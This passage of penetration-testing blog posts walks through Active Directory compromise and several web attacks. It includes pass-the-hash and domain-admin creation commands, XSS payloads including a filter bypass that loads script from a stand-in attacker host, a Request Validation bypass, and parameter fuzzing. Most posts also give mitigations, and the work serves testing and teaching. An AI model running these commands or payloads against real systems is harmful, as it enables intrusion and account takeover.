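For illustration, the SAM dump format is colon-separated: username, RID, LM hash, NT hash. A quick parse of the line above (note the LM field is the well-known aad3b435… value, meaning "no LM hash stored"):

```python
sam_line = "FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::"

# Split out the first four colon-separated fields
username, rid, lm_hash, nt_hash = sam_line.split(":")[:4]

print(username, rid)  # → FRONTDESK 1002
print(nt_hash)        # the NTLM hash we could pass-the-hash with
```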

The next step was to try the local administrator hash and spray it against the client’s server range. Note that we don’t even have to crack this administrator password, we can simply “pass-the-hash”:

cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth

admin password reuse

We can only pass-the-hash using the stored NTLM format, not the NETNTLMv2 network format (unless you look to execute an “SMB relay” attack instead).

To our surprise, it got a hit, the local administrator password had been reused on the STEWIE machine. Querying this host’s NetBIOS info:

$ cme smb 172.16.157.134 
SMB         172.16.157.134  445    STEWIE           
[*] Windows Server 2008 R2 Foundation 7600 x64 (name:STEWIE) (domain:MACFARLANE)
(signing:False) (SMBv1:True)

We can see it is a member of the MACFARLANE domain, the main domain of the client’s Active Directory.

So the non-domain machine had a local administrator password which was reused on the internal servers. We can now use Metasploit to PsExec onto the machine, using the NTLM hash as the password, which will cause Metasploit to pass-the-hash.

metasploit options

Once run, our shell is gained:

ps exec shell

We can load the Mimikatz module and read Windows memory to find passwords:

mimikatz

Looks like we have the DA (Domain Admin) account details. And to finish off, we use CME to execute commands on the Domain Controller to add ourselves as a DA (purely for a POC for our pentest, in real life or to remain more stealthy we could just use the discovered account).

cme smb 172.16.157.135 -u administrator -p 'October17' -x 'net user markitzeroda hackersPassword! /add /domain /y && net group "domain admins" markitzeroda /add'

add da

Note the use of the undocumented /y switch to suppress the prompt Windows gives you for adding a password longer than 14 characters.

A screenshot of Remote Desktop to the Domain Controller can go into the report as proof of exploitation:

da proof

So if this front desk machine had been joined to the domain, it would have had LLMNR disabled (from their Group Policy setting) and we wouldn’t have gained the initial access to it and leveraged its secrets in order to compromise the whole domain. Of course there are other mitigations such as using LAPS to manage local administrator passwords and setting FilterAdministratorToken to prevent SMB logins using the local RID 500 account (great post on this here).

How to Use X-XSS-Protection for Evil

10 February 2018 at 19:33

Two important headers that can mitigate XSS are:

  • X-XSS-Protection
  • Content-Security-Policy

So what is the difference?

Well browsers such as Internet Explorer and Chrome include an “XSS auditor” which attempts to help prevent reflected XSS from firing. The first header controls that within the browser.

Details are here, but basically the four supported options are:

X-XSS-Protection: 0
X-XSS-Protection: 1
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=<reporting-uri>

It should be noted that the auditor is active by default, unless the user (or their administrator) has disabled it.

Therefore,

X-XSS-Protection: 1

will turn it back on for the user.

The second header, Content Security Policy, is a newer header that controls where an HTML page can load its content from, including JavaScript. Basically including anything other than unsafe-inline as a directive means that injected JavaScript into the page will not execute, and can mitigate both reflected and stored XSS. CSP is a much larger topic than I’m going to cover here, however, detailed information regarding the header can be found here.

What I wanted to show you was the difference between specifying block, and either not including the header at all (which therefore will take on the setting in the browser) or specifying 1 without block. Also, for good measure I will show you the Content Security Policy mitigation for cross-site scripting.

I will show you how, if a site has specified X-XSS-Protection without block, this can be abused.

The linked page has the following code in it:

<script>document.write("one potato")</script><br />
<script>document.write("two potato")</script><br />
three potato

Now if we link straight there from the current page you’re reading, the two script blocks should fire:

normal

To demonstrate how the XSS auditors work, let’s imagine we tried to inject that script into the page ourselves by appending this query string:

?xss1=<script>document.write("one potato")</script>&xss2=<script>document.write("two potato")</script>

Note that the following will not work from Firefox, as at the time of writing Firefox doesn’t include an XSS auditor and is therefore very open to reflected XSS should the visited site be vulnerable. There is the NoScript add-on that you can use to protect yourself, should Firefox be your browser of choice. The following has been tested in Chrome 64 only. I will also enable your XSS filter in supported browsers by adding X-XSS-Protection: 1 to the output.

injected

Note how the browser now thinks that the two script blocks have been injected, and therefore blocks them and only outputs the plain HTML. View source to see the code if you don’t believe it is still there.

Viewing F12 developer tools shows us the auditor has done its stuff:

Chrome F12

Viewing source shows us which script has been blocked in red:

Source code

Now what could an attacker do to abuse the XSS auditor? Well they could manipulate the page to prevent scripts of their choosing to be blocked.

?xss2=<script>document.write("two potato")</script>

abused

Viewing the source shows the attacker has just blocked what they wanted by specifying the source code in the URL:

abused source code

Of course, editing their own link is fruitless; they would have to pass the link onto their victim(s) in some way by sending it via email, Facebook, Skype, etc …

What are the risks in this? Well The Web Application Hacker’s Handbook puts it better than I could:

web app hackers handbook quote

So, how can we defend against this? Well, you guessed it, the block directive:

X-XSS-Protection: 1; mode=block

So let’s try this again with that specified:

abused but blocked

So by specifying block we can prevent an attacker from crafting links that neutralise our existing script!

So in summary it is always good to specify block as by default XSS auditors only attempt to block what they think is being injected, which might not actually be the evil script itself.
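Setting the header server-side is a one-liner in most frameworks; here is a minimal sketch using only the Python standard library (the page content is a hypothetical stand-in):

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        body = b"<p>three potato</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        # Tell the auditor to block the whole page on suspected injection,
        # rather than selectively neutering scripts (which an attacker can abuse)
        self.send_header("X-XSS-Protection", "1; mode=block")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep output quiet
        pass

server = HTTPServer(("127.0.0.1", 0), Handler)  # port 0 = any free port
threading.Thread(target=server.serve_forever, daemon=True).start()

resp = urllib.request.urlopen(f"http://127.0.0.1:{server.server_address[1]}/")
print(resp.headers["X-XSS-Protection"])  # → 1; mode=block
server.shutdown()
```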

Content Security Policy then?

Just to demo the difference, if we output a CSP header that prevents inline script and don’t attempt to inject anything:

CSP example image

Chrome shows us this is solely down to Content Security Policy:

csp chrome error

To get round this as site developers we can either specify the script’s SHA-256 hash in our CSP, or simply move our code to a separate .js file, as long as we white-list self in our policy. Any attacker injecting inline script will be foiled. Of course, the problem with Content Security Policy is that it still seems to be an after-thought, and coming up with a policy that fits an existing site is very hard unless your site is pretty much static. However, it is a great mitigation if done properly. Any weaknesses in the policy though may be ripe for exploitation. Hopefully I’ll have a post on that in the future if I come across it in any engagements.
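For reference, a minimal policy of the kind described, allowing same-origin script files only, would look something like this (illustrative, not the exact policy used on this page):

```
Content-Security-Policy: script-src 'self'
```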

*Yeh yeh, you’re not using X-XSS-Protection for evil, but lack of block of course, and if no-one has messed with the browser settings it is as though X-XSS-Protection: 1 has been output.

Hidden XSS

3 February 2018 at 15:16

On a recent web test I was having trouble finding any instances of cross-site scripting, which is very unusual.

However, after scanning the site with nikto, some interesting things came up:

$ nikto -h rob-sec-1.com
- ***** RFIURL is not defined in nikto.conf--no RFI tests will run *****
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          193.70.91.5
+ Target Hostname:    rob-sec-1.com
+ Target Port:        80
+ Start Time:         2018-02-03 15:37:18 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie v created without the httponly flag
+ Root page / redirects to: /?node_id=V0lMTCB5b3UgYmUgcmlja3JvbGxlZD8%3D
+ Server leaks inodes via ETags, header found with file /css, inode: 0x109c8, size: 0x56, mtime: 0x543795d00f180;56450719f9b80
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /css: This might be interesting...
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 4197 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2018-02-03 15:40:15 (GMT0) (177 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Particularly this:

+ OSVDB-3092: /test/: This might be interesting...

So I navigated to /test/ and saw this at the top of the page:

Test URL in browser

So the page had the usual content, however, there appeared to be some odd text at the top, and because it said NULL this struck me as some debug output that the developers had left in on the production site.

So to find out if this debug output is populated by any query string parameter, we can use wfuzz.

First we need to determine how many bytes come back from the page on a normal request:

$ curl 'http://rob-sec-1.com/test/?' 1>/dev/null
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    53  100    53    0     0     53      0  0:00:01 --:--:--  0:00:01   289

Here we can see that this is 53. From there, we can configure wfuzz to try different parameter names and then look for any responses that have a size other than 53 characters. Here we’ll use dirb’s common.txt list as a starting point:

$ wfuzz -w /usr/share/wordlists/dirb/common.txt --hh 53 'http://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>'
********************************************************
* Wfuzz 2.2.3 - The Web Fuzzer                         *
********************************************************

Target: HTTP://rob-sec-1.com/test/?FUZZ=<script>alert("xss")</script>
Total requests: 4614

==================================================================
ID	Response   Lines      Word         Chars          Payload    
==================================================================

02127:  C=200      9 L	       8 W	     84 Ch	  "item"

Total time: 14.93025
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 309.0369
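The logic wfuzz applied here is simple; a toy model with a hypothetical page() function standing in for the real site:

```python
def page(params):
    # Hypothetical stand-in for http://rob-sec-1.com/test/ - the real site
    # echoed the parameter value only when the magic debug parameter was used.
    base = "<html><body>the normal 53-byte response</body></html>"
    if "item" in params:
        return params["item"] + "\n" + base
    return base

baseline = len(page({}))  # the equivalent of wfuzz's --hh 53 filter

wordlist = ["id", "q", "page", "debug", "item", "search"]
hits = [w for w in wordlist
        if len(page({w: '<script>alert("xss")</script>'})) != baseline]
print(hits)  # → ['item']
```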

Well, whaddya know, looks like we’ve found the parameter!

Will Smith

Copying /test/?item=<script>alert("xss")</script> into Firefox gives us our alert:

xss

ASP.NET Request Validation Bypass

14 October 2017 at 17:49

…and why you should report it (maybe).

This post is regarding the .NET Request Validation vulnerability, as described here. Note that this is nothing new, but I am still finding the issue prevalent on .NET sites in 2017.

Request Validation is an ASP.NET input filter.

This is designed to protect applications against XSS, even though Microsoft themselves state that it is not secure:

Even if you’re using request validation, you should HTML-encode text that you get from users before you display it on a page.

To me, that seems a bit mad. If you are providing users of your framework with functionality that mitigates XSS, why do users then have to do the one thing that mitigates XSS themselves?

Microsoft should have ensured that all .NET controls properly output things HTML encoded. For example, unless the developer manually output-encodes the data in the following example, XSS will be introduced.

<asp:Repeater ID="Repeater2" runat="server">
  <ItemTemplate>
    <%# Eval("YourField") %>
  </ItemTemplate>
</asp:Repeater>

The <%: syntax introduced in .NET 4 was a good move for automatic HTML encoding, although it should have existed from the start.

Now to summarise, normally ASP.NET Request Validation blocks any HTTP request that appears to contain tags. e.g.

example.com/?foo=<b> would result in A potentially dangerous Request.QueryString value was detected from the client error, presented on a nice Yellow Screen of Death.

This is to prevent a user from inserting a <script> tag into user input, or from trying some other form such as <svg onload="alert(1)" />.

However, the flaw in this is that <%tag is allowed. This is a quirky tag that only works in Internet Explorer 9. I originally thought it required IE9 standards mode, but it actually works in either mode; however, if the page is in quirks mode then it requires user interaction (like a mouseover). For example, the existing page can be seen to be in quirks mode as it contains the following type definition and meta tag (although in tests only the meta tag seems to be required):

<!doctype html>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
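Request Validation’s tag check can be modelled roughly as follows; this is an approximation for illustration, not the actual .NET implementation:

```python
import re

def looks_dangerous(value):
    # Rough model: a '<' followed by a letter, '!', '/' or '?' is flagged.
    # '<%' is not in that set, so it slips through the filter.
    return re.search(r"<[a-zA-Z!/?]", value) is not None

print(looks_dangerous('<script>alert(1)</script>'))      # → True (blocked)
print(looks_dangerous('<%tag onmouseover="alert(1)">'))  # → False (allowed!)
```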

I’ve setup an example here that you can try in IE9. The code is as follows:

<!doctype html>
<html>
<head>
	<meta http-equiv="X-UA-Compatible" content="IE=Edge">
</head>
<body>

	<%tag onmouseover="alert('markitzeroday.com')">Move mouse here

</body>
</html>

Loading your target page in Internet Explorer 9 and then viewing developer tools will show you whether the page is rendered in quirks mode.

Moving the mouse over the text gives our favourite notification from a computer ever - that which proves JavaScript execution has taken place:

XSS Proof

Edit: Actually this does work in quirks mode too using a CSS vector and no document type declaration:

<html>
<head>
</head>
<body>

        <%tag style="xss:expression(alert('markitzeroday.com'))">And you don't even have to mouseover

</body>
</html>

Example Warning: This is a trap, and you may need to hold escape to well… escape.

Now, you should report this in your pentest or bug bounty reports if you can prove JavaScript execution in IE9, either stored or reflected. Unfortunately it is not enough to bypass Request Validation in itself as XSS is an output vulnerability, not an input one.

Note that it is important that this is reported, even though it affects Internet Explorer 9 only. The reasons are as follows:

  • Some organisations are “stuck” on old versions of Internet Explorer for compatibility reasons. Their IT department will not upgrade the browsers network wide as a piece of software bought in 2011 for £150,000 will not run on anything else.
  • By getting XSS with one browser version, you are proving that adequate output encoding is not in place. This shows the application is vulnerable should it also use data from other sources. e.g. User input from a database shared with a non ASP.NET app, or an app that is written properly as not to rely on ASP.NET Request Validation.
    • Granted you can only test inputs from your “in-scope” applications and prove that those inputs have a vulnerable sink when output elsewhere, although chances are that if one part of the application is vulnerable then other parts will be and you can alert your client to this possibility quite literally.

Note also that Request Validation inhibits functionality. Much like my post on functional flaws vs security flaws, preventing a user from entering certain characters and then resolving this by issuing an HTTP 500 response results in a broken app. If such character sequences are not allowed, you should alert the user in a friendly way and give them a chance to fix it first, even if this is only client-side validation. Also, any automated process that POSTs or GETs data containing < to your application may unexpectedly fail.

The thing that Microsoft got wrong with Request Validation is that XSS is an output problem, not an input problem. The Microsoft article linked above is still confused about this:

If you disable request validation, you must check the user input yourself for dangerous HTML or JavaScript.

Of course, if you want a highly secure site as your risk appetite is low, then do validate user input. Don’t let non alphanumeric characters be entered if they are not needed. However, the primary mitigation for XSS is output encoding. This is the act of changing characters like < to &lt;. Then it doesn’t matter if this is output to your page as the browser won’t execute it and therefore no XSS.
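Output encoding in any language amounts to the same substitution; in Python, for example:

```python
import html

user_input = '<svg onload="alert(1)" />'
encoded = html.escape(user_input)  # & < > " ' become entities
print(encoded)  # → &lt;svg onload=&quot;alert(1)&quot; /&gt;
```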

So as a pentester, report it if IE9 shows the alert, even if IE9 should be killed with fire. As a developer, turn Request Validation off and develop your application to HTML encode everywhere (don’t output into JavaScript directly - just don’t). If you need “extra” security, prevent non alphanumerics from being inserted into fields yourself through server-side validation.

XSS Without Dots

26 July 2017 at 20:02

A recent site that I pentested was echoing everything on the query string and POST data into a <div> tag.

e.g. example.php?monkey=banana gave

<div>
monkey => banana
</div>

I’m guessing this was for debugging reasons. So an easy XSS with

example.php?<script>alert(1)</script> gave

<div>
<script>alert(1)</script>
</div>

So I thought rather than just echoing 1 or xss I’d output the current cookie as a simple POC.

However, things weren’t as they seemed:

example.php?<script>alert(document.cookie)</script> gave

<div>
<script>alert(document_cookie)</script>
</div>

Underscore!? Oh well, I’ll just use an accessor to access the property:

example.php?<script>alert(document['cookie'])</script>. Nope:

<div>
<script>alert(document[
</div>

So I thought the answer was to host the script on a remote domain:

example.php?<script src="//attacker-site.co.uk/sc.js"></script>:

<div>
<script_src="//attacker-site_co_uk/sc_js"></script>
</div>

Doh! Two problems….

A quick Google gave the answer to use %0C for the space:

example.php?<script%0Csrc="//attacker-site.co.uk/sc.js"></script>

And then to get the dots, we can simply HTML encode them as we are in an HTML context:

example.php?<script%0Csrc="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>

which percent encoded is of course

example.php?<script%0Csrc="//attacker-site%26%2346%3bco%26%2346%3buk/sc%26%2346%3bjs"></script>

And this delivered the goods:

<div>
<script src="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>
</div>

which the browser reads as

<script src="//attacker-site.co.uk/sc.js"></script>

And dutifully delivers our message box:

Alert
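Incidentally, the browser’s entity-decoding step can be reproduced with Python’s html module:

```python
import html

# The payload as it appears in the page source, with dots as &#46; entities
injected = '<script src="//attacker-site&#46;co&#46;uk/sc&#46;js"></script>'
print(html.unescape(injected))
# → <script src="//attacker-site.co.uk/sc.js"></script>
```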

CSRF Mitigation for AJAX Requests

29 June 2017 at 11:34

To start with, a quick recap on what Cross-Site Request Forgery is:

  1. User is logged into their bank’s website: https://example.com.
  2. The bank website has a “money transfer” function: https://example.com/manage_money/transfer.do.
  3. The “money transfer” function accepts the following POST parameters: toAccount and amount.
  4. While logged into https://example.com the user receives an email from a person they think is their friend.
  5. The user clicks the link inside the email to access a cat video: https://attacker-site.co.uk/cats.htm.
  6. cats.htm whilst displaying said cat video, also makes a client-side AJAX request to https://example.com/manage_money/transfer.do POSTing the values toAccount=1234 and amount=100 transferring £100 to the attacker’s account from the victim.

Quick POC here that only POSTs to example.com and not your bank. Hopefully your bank already has CSRF mitigation in place. View source, developer console and Burp or Fiddler are your friends.

There’s a common misconception that websites can’t make cross-domain requests to other domains due to the Same Origin Policy. This could be due to the following being displayed within the browser console:

CORS Error

However, this is not the case. The request has been made; the browser message is telling you that the current origin (https://attacker-site.co.uk) simply cannot read any of the returned data from the cross-domain request. However, unlike an XSS attack, it doesn’t need to. The request has been made, and because the user is logged into the bank and therefore has a session cookie, this session cookie has been passed to the bank site, authorising the transaction.

Quick Demo

Simulate the bank issuing a session cookie by creating our own in the browser:

Cookie Setup

Note we’ll set the Secure and HttpOnly flags to show these have no effect on CSRF.

Visit the website:

Attacker Site CATS!

The following request is sent, note our session cookie is included:

Burp Request

Therefore as far as the web application is concerned, this is a legitimate request from the user to transfer the money despite the browser returning Cross-Origin Request Blocked. Only the response is blocked, not the original request.

AJAX Mitigation

If the target application has no CSRF mitigation in place, the above works for both AJAX requests and traditional form POSTs. This can be mitigated using the traditionally recommended Synchronizer Token Pattern. This involves creating a random, unpredictable token (in addition to the session token held in the cookie) and storing this server-side as a session variable. When a POST is made, this anti-CSRF token is also sent, but using any mechanism apart from cookies. This means that the anti-CSRF token will not be automatically included from the browser should the user follow a dodgy link that makes its own cross-domain request. CSRF averted.
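A sketch of the token half of this pattern (function names hypothetical; a server-side session store is assumed):

```python
import hmac
import secrets

session = {}  # stand-in for server-side session storage

def issue_csrf_token(session):
    # One unpredictable token per session, sent to the page but never in a cookie
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]

def check_csrf_token(session, submitted):
    # Constant-time comparison to avoid leaking the token via timing
    return hmac.compare_digest(session.get("csrf_token", ""), submitted or "")

token = issue_csrf_token(session)
print(check_csrf_token(session, token))    # → True
print(check_csrf_token(session, "guess"))  # → False
```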

But what if there was another way? One little known way is to include a custom header, such as X-Requested-With, as I answered here.

Basically:

  1. Set the custom header in every AJAX request that changes server-side state of the application. e.g. X-Requested-With: XMLHttpRequest.
  2. In each server-side method handler, ensure a CSRF check function is called.
  3. The CSRF function examines the HTTP request and checks that X-Requested-With: XMLHttpRequest is present as a header.
  4. If it is, it is allowed. If it isn’t, send an HTTP 403 response and log this server-side.
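Server-side, the check is deliberately simple: the presence of the header is all that matters. A minimal sketch (hypothetical handler, not any particular framework):

```python
def csrf_check(request_headers):
    # Steps 2-4: reject any state-changing request lacking the custom header
    if request_headers.get("X-Requested-With") != "XMLHttpRequest":
        return 403  # and log the attempt server-side
    return 200

print(csrf_check({"X-Requested-With": "XMLHttpRequest"}))  # → 200
print(csrf_check({}))                                      # → 403
```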

Many JavaScript frameworks such as jQuery will automatically send this header along with any AJAX requests. This header cannot be sent cross-domain:

  1. Any attempt to do so with a modern browser will trigger a CORS preflight request.
  2. Older browsers (think IE 8 and 9) can send cross-domain requests, but custom headers are not supported at all.
  3. Very old browsers cannot send cross-domain AJAX requests at all.

What is a Preflight?

So, referring to the above, very old browsers couldn’t make cross-domain requests via AJAX at all. Therefore, you may get an old website that checks for a custom header server-side so that it knows it is an AJAX request. Now, the web is developed on the basis of “no breaking changes”. Therefore any new technologies introduced into the browser should not force websites to update themselves in order to continue working (why not visit the World Wide Web - apparently the world’s first website). This goes for functionality as well as security.

Therefore, suddenly allowing browsers to send cross-domain headers could break security if a site relies on this for CSRF mitigation. This scenario covers both points 2 and 3.

So that leaves 1, CORS (Cross-Origin Resource Sharing). CORS is a mechanism that weakens security. Its aim is to allow sites that trust one another to break the Same Origin Policy and read each other’s responses. e.g. api.example.org might allow example.org to make a cross-domain request and read the response in the browser, using the user’s session cookie as authorisation.

In a nutshell, CORS does not prevent anything that used to be possible from happening. For example, a cross-domain POST using <form method="post"> has always been allowed, so CORS allows any AJAX request that results in a previously possible HTTP request to be made without a preflight request, as this introduces no extra risk. However, a request with custom headers causes the browser to automatically send a request to the endpoint using the OPTIONS verb. If the server-side application recognises the OPTIONS request (i.e. it is CORS aware), it will reply with a header showing which headers will be allowed from the calling domain.

Here you can see the attempt to send X-Requested-With in a cross-domain POST results in an OPTIONS request requesting this header be allowed, rather than the actual request. This is the preflight.

OPTIONS verb

If the server-side is not explicitly configured to allow this (i.e. no Access-Control-Allow-Origin to allow the domain and no Access-Control-Allow-Headers to allow the custom header):

OPTIONS response

The header is not allowed because our example.com domain is not configured for CORS.

Therefore if CORS is not allowing the attacker’s domain to send extra headers, this mitigates CSRF.

Will This Work?

What To Look For When Pentesting

The above will only work if the server-side application is verifying that the custom header X-Requested-With is received in the request. As a pentester you should verify that all potentially discovered CSRF vulnerabilities are actually exploitable. Burp Suite allows this via right clicking an item then clicking Engagement tools > Create CSRF PoC. This may result in two things:

  1. If you weren’t aware of the above, you may find a POST request that first appeared vulnerable to CSRF (due to no tokens) however isn’t due to header checking.
  2. If, after having read this post, you find that an AJAX request is sending X-Requested-With: XMLHttpRequest, you may find that removing this header still causes the “unsafe” action to take place server-side, and therefore the request is vulnerable.

What To Do As A Developer

This may be a good short-cut if your server-side language of choice does not support server-side variables or if you do not want the extra overhead of storing an additional token per user session. However, make sure that the presence of the HTTP request header is verified for every handler that makes a change of state to your application. Aka, “unsafe” requests as defined by the RFC.

Remember, this only works for AJAX requests. If your application has to fall-back to full HTML requests if JavaScript is disabled, then this will not work for you. Custom headers cannot be sent via <form> tags.

Conclusion

This is a useful, easy-to-implement mitigation for CSRF. Although an attacker can easily add a custom header themselves (e.g. using Burp Suite), they can only do this to their own requests, not to those of the victim as required in a client-side attack. There were vulnerabilities in Flash that allowed a custom header to be added to a cross-domain request, via a second attacker-controlled site serving a permissive crossdomain.xml. Unlike HTML, Flash requires a crossdomain.xml file for any cross-domain request, even those that are write-only, such as CSRF. The trick was for the attacker to issue a 307 HTTP redirect from their second domain to the victim website; the bug in Flash carried the custom header over from the original request. However, as Flash is moribund and this was a bug, I would say it is generally safe for most sites to rely on the presence of the header as a mitigation. If the risk appetite for the application in question is low, go with token mitigation instead, or as well: defence in depth.

Note that the Flash bug was fixed back in 2015.

XSS Hunting

3 March 2020 at 08:55

This post documents one of my findings from a bug bounty program. The program had around 20 web applications in scope. Luckily the first application I chose was a treasure trove of bugs, so that kept me busy for a while. When I decided to move on, I picked another one at random, which was the organisation’s recruitment application.

I found a cross-site scripting (XSS) vulnerability via an HTML file upload, but unfortunately the program manager marked this as a duplicate. In case you’re not familiar with bug bounties, this is because another researcher had found and logged the vulnerability with the program manager before me, and only the first submission on any valid bug is considered for reward.

After sifting through the site a few times, it appeared that all the low hanging fruit had gone. Time to bring out the big guns.

This time it’s in the form of my new favourite fuzzer ffuf.

ffuf -w /usr/share/wordlists/dirb/big.txt -u https://rob-sec-1.com/FUZZ -o Ffuf/Recruitment.csv -X HEAD -of csv

This is like the directory fuzzers of old, such as dirb and DirBuster; however, it is written in Go, which is much, much faster.

What this tool will do is try to enumerate different directories within the application, replacing FUZZ with items from the big.txt list of words. If we sneak a peek at a sample of this file:

$ shuf -n 10 /usr/share/wordlists/dirb/big.txt
odds
papers
diamonds
beispiel
comunidades
webmilesde
java-plugin
65
luntan
oldshop

…ffuf will try URL paths such as https://rob-sec-1.com/odds, https://rob-sec-1.com/papers, https://rob-sec-1.com/diamonds, etc., and report on what it finds. The -X parameter tells it to use the HEAD HTTP method, which will only retrieve HTTP headers from the target site rather than full pages. Usually retrieving HEAD will be enough to determine whether a hidden page exists or not. The thing I like most about ffuf is the auto-calibrate option, which determines “what is normal” for an application to return. I’ve not used this option here, but if you pass the -ac parameter (I don’t recommend this with -X HEAD), it will grab a few random URL paths of its own to see if the application follows the web standard of returning HTTP 404 errors for non-existent pages, or whether it returns something else. In the latter case, if something non-standard is returned, ffuf will often determine what makes this response unique, and tune its engine to only output results that differ from the norm and are thus worthy of investigation. This uses page response size as one of the factors, which is the reason I don’t recommend -X HEAD with it: HEAD does not return the body nor its size, so auto-calibration will be heavily restricted.
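The FUZZ substitution itself is trivial; a quick Python sketch (mine, purely to illustrate what the tool does with each wordlist entry before requesting it):

```python
def expand_fuzz(template, words):
    """Replace the FUZZ marker with each wordlist entry, as ffuf does
    before requesting each candidate URL."""
    return [template.replace("FUZZ", word) for word in words]

candidates = expand_fuzz("https://rob-sec-1.com/FUZZ", ["odds", "papers", "diamonds"])
print(candidates[0])  # https://rob-sec-1.com/odds
```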

Anyway, back to the application. Ffuf running:

Ffuf running

Running the above generated the following CSV that we can read from the Linux terminal using the column command:

column -s, -t Ffuf/Recruitment.csv

Ffuf output

The result I have highlighted above jumped out at me. Third party tools deployed to a web application can be a huge source of vulnerabilities, as the code can often be dropped in without review, and, as long as it is working, tends to get forgotten about and never updated. A quick Google revealed that this was in fact from a software package called ZeroEditor, and was probably not just a directory made on the site:

Google

Note that, as usual, I have anonymised and recreated the details of the application, the third party software, and the vulnerability in my lab. Details have been changed to protect the vulnerable. If you Google this you won’t find an ASP.NET HTML editor as the first result, and my post has nothing to do with the websites and applications that are returned.

From the third party vendor’s website I downloaded the source code that was available in a zip, and then used the following command to turn the installation directory structure into my own custom wordlist:

find . -type f > ../WebApp/ZeroEditor-Fuzz-All.txt

In this file I noticed lots of “non-dangerous” file types such as those in the “Images” directory, so I filtered this like so:

cat ZeroEditor-Fuzz-All.txt | grep -v 'Images' > ZeroEditor-Fuzz-No-Images.txt

Now we can see the top few lines from the non-filtered, and the filtered custom word lists for this editor:

Filter

Now we can run ffuf again, this time using the custom word list we made:

ffuf -w ZeroEditor-Fuzz-No-Images.txt -u https://rob-sec-1.com/ZeroEditor/FUZZ -o Ffuf/Recruitment-ZeroEditor-Fuzz.csv -X HEAD -of csv -H 'User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0' -t 1

This time we are only running one thread (-t 1), as from our earlier fuzzing we can tell the web app or its server isn’t really up to much performance wise, so in this instance we are happy to go slow.

Ffuf with Custom List

and we can show in columns as before:

Ffuf columns with Custom List

My attention was drawn to the last two results. An ASPX page: could there be something juicy in there? Also a Shockwave Flash file. I did actually decompile the latter, but it turned out just to be a standard Google video player, and I couldn’t find any XSS or anything else that interesting in its code.

Going back to Spell-Check-Dialog.aspx: what could we do with this discovered file?

Loading the page directly gave the following:

Spellchecker Page

Initially my go-to would have been param-miner, which can find hidden parameters like I did here using wfuzz. The difference is that param-miner is faster, as it will try multiple parameters at once by employing a binary search, and it will also use an algorithmic approach for detecting differences in content without you having to specify what the baseline is (similar to ffuf in this regard).

But we don’t need to do that, as I already had the source code, so I could analyse it for vulnerabilities myself.

Examining the code I found the following that reflected a parameter:

<asp:panel id="DialogFrame" runat="server" visible="False" enableviewstate="False">
            <iframe id="SpellFrame" name="SpellFrame" src="Spell-Check-Dialog.aspx?ZELanguage=<%=Request.Params["ZELanguage"]%>" frameborder="0" width="500" scrolling="no" height="340" style="width:500;height:340"></iframe>
        </asp:panel>

That is, the code <%=Request.Params["ZELanguage"]%> outputs ZELanguage from the query string or POST data without applying the one thing that mitigates cross-site scripting: output encoding.

However, when I went ahead and passed the query string for ZELanguage nothing happened:

https://rob-sec-1.com/ZeroEditor/Spell-Check-Dialog.aspx?ZELanguage=FOOBAR

No XSS

I guessed this could be due to the default visible="False" in the above asp:panel tag. After further examination I found the code to make DialogFrame visible:

  void Page_Init(object sender, EventArgs e)
  {
      // show iframe when needed for MD support
      if (Request.Params["MD"] != null)
      {
          this.DialogFrame.Visible = true;
          return;
      }
  }

In summary, it looked like I just needed to set MD to something as well. Hence from the hidden page I found the two hidden query string parameters: MD=true&ZELanguage=FOOBAR.

And reviewing the code to find out how it worked enabled me to construct the new query string:

https://rob-sec-1.com/ZeroEditor/Spell-Check-Dialog.aspx?MD=true&ZELanguage=FOOBAR"></iframe><script>alert(321)</script>

Bingo, XSS:

XSS
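The breakout can be sketched outside the browser (a recreation in Python of my own, not the vendor’s code):

```python
# Recreation of the vulnerable reflection: the parameter is concatenated
# into the iframe src attribute with no output encoding.
template = ('<iframe id="SpellFrame" name="SpellFrame" '
            'src="Spell-Check-Dialog.aspx?ZELanguage={param}"></iframe>')

payload = 'FOOBAR"></iframe><script>alert(321)</script>'
rendered = template.format(param=payload)

# The double quote and closing tag in the payload terminate the src
# attribute and the iframe, leaving a live <script> element in the page.
print('<script>alert(321)</script>' in rendered)  # True
```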

This would have been mitigated if the vendor had encoded on output: <%=Server.HtmlEncode(Request.Params["ZELanguage"])%>
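In Python terms, the stdlib equivalent of that fix is html.escape, which renders the payload inert (my illustration, using the same payload as above):

```python
from html import escape  # stdlib HTML output encoding

payload = 'FOOBAR"></iframe><script>alert(321)</script>'
encoded = escape(payload, quote=True)

print(encoded)
# FOOBAR&quot;&gt;&lt;/iframe&gt;&lt;script&gt;alert(321)&lt;/script&gt;
print("<script>" in encoded)  # False: no markup survives the encoding
```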

